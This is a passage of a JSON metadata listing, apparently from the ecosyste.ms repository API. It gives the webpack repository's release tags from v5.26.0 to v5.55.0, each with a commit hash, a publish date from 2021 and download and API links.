0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/ho